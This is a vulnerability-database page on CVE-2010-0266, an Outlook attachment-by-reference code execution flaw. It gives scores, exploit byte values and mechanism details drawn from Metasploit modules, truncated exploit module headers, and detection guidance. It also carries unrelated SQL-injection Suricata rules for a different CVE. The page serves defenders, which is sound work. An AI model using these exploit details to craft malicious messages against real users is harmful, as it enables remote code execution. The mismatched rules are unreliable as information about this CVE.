CVE-2010-0266
published 2010-07-15CVE-2010-0266: Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of…
PriorityP266critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
55.28%
98.9th percentile
Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability."
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | outlook | — | — |
| microsoft | outlook | — | — |
| microsoft | outlook | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPR_ATTACH_METHOD = ATTACH_BY_REF_RESOLVE (value 3): attprops << "\x03\x00\x00\x00" # Value data ATTACH_BY_REF_RESOLVE (3)↗
commandPR_ATTACH_METHOD = ATTACH_BY_REF_ONLY (value 4): attprops << "\x04\x00\x00\x00" # Value data ATTACH_BY_REF_ONLY (4)↗
bytes↗
TNEF signature: \x78\x9f\x3e\x22
bytes↗
TNEF attAttachRenddata fixed bytes: \x01\x00\xff\xff\xff\xff\x20\x00\x20\x00\x00\x00\x00\x00
- →Detect malicious TNEF (winmail.dat) attachments containing MAPI PR_ATTACH_METHOD property set to ATTACH_BY_REF_RESOLVE (0x03) or ATTACH_BY_REF_ONLY (0x04) with a PR_ATTACH_LONG_PATHNAME pointing to a remote UNC or file:// path ending in .exe ↗
- →Inspect inbound email for MIME parts with Content-Type 'application/ms-tnef' and attachment name 'winmail.dat'; parse the TNEF stream for the 0x223e9f78 signature followed by attAttachment (0x9005) blocks containing PR_ATTACH_METHOD values of 3 or 4 ↗
- →Alert on WebDAV OPTIONS/PROPFIND requests to port 80 from Outlook processes (WINWORD.EXE, OUTLOOK.EXE) immediately after opening a TNEF email, as the exploit triggers the WebDAV Mini-Redirector to fetch a remote .exe payload ↗
- →Flag TNEF attachments where PR_ATTACH_LONG_PATHNAME (MAPI property 0x370d) contains a 'file://' URI or UNC path (\\host\share\) pointing to an executable, as this is the mechanism used to redirect execution to a remote file ↗
- →Detect TNEF streams where the displayed filename extension (PR_ATTACH_LONG_FILENAME) is a benign image type (e.g., .jpg, .png) while PR_ATTACH_LONG_PATHNAME resolves to a .exe, indicating extension spoofing ↗
- →Monitor for MAPI message class values 'IPM.Document.txtfile' or 'IPM.Document.jpegfile' in incoming messages, which are non-standard classes used by the exploit to disguise the malicious attachment ↗
- ·The Metasploit exploit requires SRVPORT=80 and URIPATH=/ and cannot be changed; the WebDAV delivery mechanism only works over port 80 ↗
- ·Exploitation is limited by the fact that attackers cannot supply command-line options to the executed file, restricting payload flexibility ↗
- ·The exploit is passive (user-assisted); the victim must double-click the attachment or message for code execution to occur ↗
- ·The ATTACH_BY_REF_ONLY variant appends '?.dat' to the remote .exe path in the pathname field, which may be used to bypass naive URL-based detections that only look for bare .exe extensions ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005618; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005617; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005615; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005620; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_1
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005616; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, update
Suricata
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-0266 [HIGH] ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005619; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Exploit-DB
Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)
exploitdb·2010-09-20
CVE-2010-0266 Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)
Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)
---
##
# $Id: ms10_045_outlook_ref_resolve.rb 10389 2010-09-20 04:38:13Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Outlook ATTACH_BY_REF_RESOLVE File Execution',
'Description' => %q{
It has been discovered that certain e-mail message cause Outlook to create Windows
shortcut-like attachments or messages within Outlook. Through specially crafted TNEF
streams with certain MAPI attachment properties, it is possible to set a path name
to files to be
Exploit-DB
Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)
exploitdb·2010-09-20
CVE-2010-0266 Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)
Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)
---
##
# $Id: ms10_045_outlook_ref_only.rb 10389 2010-09-20 04:38:13Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Outlook ATTACH_BY_REF_ONLY File Execution',
'Description' => %q{
It has been discovered that certain e-mail message cause Outlook to create Windows
shortcut-like attachments or messages within Outlook. Through specially crafted TNEF
streams with certain MAPI attachment properties, it is possible to set a path name
to files to be executed.
Metasploit
Outlook ATTACH_BY_REF_ONLY File Execution
metasploit
Outlook ATTACH_BY_REF_ONLY File Execution
Outlook ATTACH_BY_REF_ONLY File Execution
It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely (on a file share, for example) can be used. Exploitation is limited by the fact that it is not possible for attackers to supply command line options.
Metasploit
Outlook ATTACH_BY_REF_RESOLVE File Execution
metasploit
Outlook ATTACH_BY_REF_RESOLVE File Execution
Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.
No writeups or analysis indexed.
http://www.us-cert.gov/cas/techalerts/TA10-194A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-045https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11623http://www.us-cert.gov/cas/techalerts/TA10-194A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-045https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11623
2010-07-15
Published